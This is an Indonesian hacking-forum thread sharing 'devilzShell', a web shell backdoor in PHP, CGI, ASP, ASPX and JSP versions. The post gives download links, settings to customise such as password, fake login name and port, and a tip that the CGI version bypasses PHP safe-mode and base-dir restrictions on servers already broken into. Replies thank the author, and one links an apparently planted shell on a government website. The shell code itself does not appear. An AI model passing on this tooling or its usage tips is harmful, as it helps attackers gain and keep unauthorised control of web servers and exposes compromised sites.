[SHELL] devilzShell [php/cgi/asp/aspx/jsp]

nih kak temenku si [color=#32CD32]b374[/color][color=#FFD700]k[/color] buat shell ada 5 macem…

devshell.php
devshell.cgi
devshell.asp
devshell.aspx
devshell.jsp

semuanya kurang lebih sama… cuma beda dalemannya aja :seneng:

pake password kak

monggo digunakan kak
dwnload disini
http://packetstormsecurity.org/files/90783/Devshell-Backdoor.html
miror
http://formatnews.com/devshell.zip
didalemnya ada [color=#FF0000]source[/color]nya juga…
jadi bisa buat [color=#FF0000]belajar/dimodifikasi sendiri [/color]yah kak…
[color=#FF0000]100% bersih no hidden backdoor[/color]
hehehe ak dan om b374k ga doyan nyolong shell kak…
klo mau bisa nyari sendiri kan… hihihihi
:pinter:

untuk modifikasi…
variable ini bisa kamu modif…

  • shell_name <-- ini nama shell…
  • shell_fake_name <-- ini ntar yg nongol di halaman login shell
  • shell_title <-- ini title nya kak… bisa digaul2in pake nama kk…
  • shell_password <-- passwordnya
  • shell_fav_port <-- tiap orang punya port favorit :-p
  • shell_color <-- nah ini yg paling asoy… bisa rubah warna warni shell nya sesuai keinginan kk…
    untuk warna kk bisa kesini
    http://www.colorschemer.com/online.html

special note untuk devshell.cgi
pertama kk harus tau dimana perl binary berada…
defaultnya ada di /usr/bin/perl
nah klo misalnya dia ada di /usr/local/bin/perl
kk rubah yg di devshell.cgi dipaling atas
[php]
#!/usr/bin/perl
[/php]
jadi
[php]
#!/usr/local/bin/perl
[/php]
ato misalnya di c:\perl\perl.exe
rubah jadi
[php]
#!“c:\perl\perl.exe”
[/php]
jgn lupa cgi-nya harus punya execute permission (chmod +x)
biasanya sih klo cgi dipake kl d dpet shell php…
buat bypass safemode / base dir restriction dll…

thx to all devilzc0der…
love this family ^^


om ketek emang orang paling bae sedunia…kekekeke

langsung ane sedoouuuuttttt

thank’s om ketek

wah gilaaaaa mantap tuh bang :smiley:
hbat emang neeh bang ketek :-*

mantab dua puluh jempol buat om ketek
izin sedot dulu nich om

sllluuuuuuuuuurrrrrrrrrrpppppppppp

ijin nyoba kk, aq juga lg buat shell ni buat devilzc0der :slight_smile:

buset kk… skaligus 5 gitu ya… ijin sedoooooooooooot…
mantapppppphssss

mantep bang ketek…

keren…

ane sticky dulu bang

hadeeeh langsung brojol 5 biji keren banget

azik ak udah liat2 s0urce na om ketek…
buat belajar nih…

teeengkyu beraaaaaaat… l0p yu 0m :-p

yeeeeeeee…kerennnn kk aku ganti warnanya…
http://iltod.gov.mn/css/revtan.php

mantep bang…
makasih neee…
om ketek memang top dah…
izin coba om…

:smiley: waaa makasih bro btw di kerinci.net ane liat blum ada ya[hr]
eh ada deng maaf gak liat xixixixi

wah
keren dah om ketek inii
ijin dipake om

wah thxs om ketek…nice banget om

wah… mantap om ketek… izin nyobanya om… :slight_smile:

Digebrakin elmu’y daghhh…thank’z om ketek

eh btw, ketek orang mana ya ??? Kerinci ??
btw lg, Kerinci itu kota kelahiran alias kampung halaman ane…

Ijin sedot om ketek, muantabz pool

asik udhe ada shell devilzc0de sendiri nih…hahaha, kalo mau sih masukin ajah di wikipedianya devizlc0de ok…

manteb jaya om ketek… sedotz dolo :smiley:

syiipph kawan2… monggo dicedoooot…

dan diutak atik sendiri ya…
klo ada yg bingung sama source nya g usah sungkan bertanya…
klo ada kritik juga silahkan ^^ maklum ak masih pemula om :smiley:

huaaa…
om ketek keren dah!
update terus shell nya…